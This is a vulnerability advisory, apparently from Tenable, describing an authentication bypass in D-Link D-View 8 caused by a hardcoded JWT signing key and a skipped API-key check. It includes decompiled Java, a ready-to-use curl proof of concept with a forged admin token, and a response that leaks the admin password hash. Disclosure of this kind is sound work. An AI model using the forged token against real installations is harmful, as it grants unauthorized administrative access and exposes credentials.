Authentication Bypass in D-Link D-View 8

A researcher at Tenable discovered an authentication bypass vulnerability in D-Link D-View 8 v2.0.1.28.

D-View 8 uses a static key (D-Link) to protect the JWT token used in user authentication:

// webApi-0.0.1-SNAPSHOT.jar!com.dlink.dview8.webapi.utils.TokenUtils

  public static String verifyToken(String token) {
    if (Utils.isEmpty(token))
      return null; 
    Algorithm algorithm = Algorithm.HMAC256("D-Link");
    JWTVerifier verifier = JWT.require(algorithm).build();
    DecodedJWT jwt = verifier.verify(token);
    return jwt.getClaim("userId").asString();
  }

D-View 8 supports login with an API key, but the supplied API key in the JWT token (accessToken) is not checked if there is no API key configured for the login user:

// webApi-0.0.1-SNAPSHOT.jar!com.dlink.dview8.webapi.base.shiro.WebApiRealm

      } else if (type == DViewConstant.LoginType.ApiKey) {
        String restApiKey = TokenUtils.getRestApiKey(accessToken);
        boolean isFindApiKeyToken = false;
        List<RestApiKey> apiKeys = this.restApiKeyDBService.queryRestApiKeyByUserId(userId, new String[] { "key", "status" });
        if (!Utils.isEmpty(apiKeys)) {
          for (RestApiKey apiKey : apiKeys) {
            if (restApiKey.equals(apiKey.getKey()) && apiKey.getStatus() != null && apiKey.getStatus().intValue() == 1)
              isFindApiKeyToken = true; 
          } 
          if (!isFindApiKeyToken) {
            log.error("REST API Key Token is invaild.");
            throw new UnknownAccountException("user.token.invalid");
          } 
        } 

Upon D-View 8 installation, there is no API key configured for the default user admin. In addition, the userId for the admin user appears to remain the same (59171d56-e6b4-4789-90ff-a7a27fd48548) across installations. With a known JWT secret key, an unauthenticated remote attacker can craft a valid JWT token and use the token to access protected APIs.

Proof of Concept:

curl -k -H 'Authorization: eyJhbGciOiAiSFMyNTYiLCJ0eXAiOiAiand0In0.eyJvcmdJZCI6ICIxMjM0NTY3OC0xMjM0LTEyMzQtMTIzNC0xMjM0NTY3ODA5YWEiLCJ1c2VySWQiOiAiNTkxNzFkNTYtZTZiNC00Nzg5LTkwZmYtYTdhMjdmZDQ4NTQ4IiwidHlwZSI6IDMsImtleSI6ICIxMjM0NTY3OC0xMjM0LTEyMzQtMTIzNC0xMjM0NTY3ODkwYmIiLCJpYXQiOiAxNjg2NzY1MTk4LCJqdGkiOiAiZmRhOGU1YzNlNWY1MTQ5MDMzZThiM2FkNWI3ZDhjMjUiLCJuYmYiOiAxNjg2NzYxNTk4LCJleHAiOiAxODQ0NDQ1MTk4fQ.5swhQdiev4r8ZDNkJAFVkGfRTIaUQlwVue2AI18CrcI' 'https://<dview8-host>:17300/dview8/api/usersByLevel'

---- response ----

{
  "code" : 200,
  "value" : [ {
    "userId" : "59171d56-e6b4-4789-90ff-a7a27fd48548",
    "userName" : "admin",
    "passWord" : "JEspzb0swmH1ItPCNvMsVA==",
    "email" : " ",
    "description" : "",
    "status" : 1,
    "createTime" : 1569208381096,
    "updateTime" : 1569295082216,
    "address" : "",
    "type" : 1,
    "phone" : "",
    "nickname" : "Super Administrator",
    "logo" : "",
    "isReset" : true,
    "loginIp" : "<REDACTED>",
    "isVerifyToken" : true,
    "verifyTokenTime" : 15,
    "isEmailActivate" : false,
    "privilege" : [ {
      "id" : "728be557-1711-4f0c-98f5-2e23a1848fa3",
      "roleId" : "4c8396d1-439f-40a7-bf78-aabc1f207b4c",
      "name" : "MyOrg4",
      "children" : [ ]
    } ]
  } ],
  "success" : true
}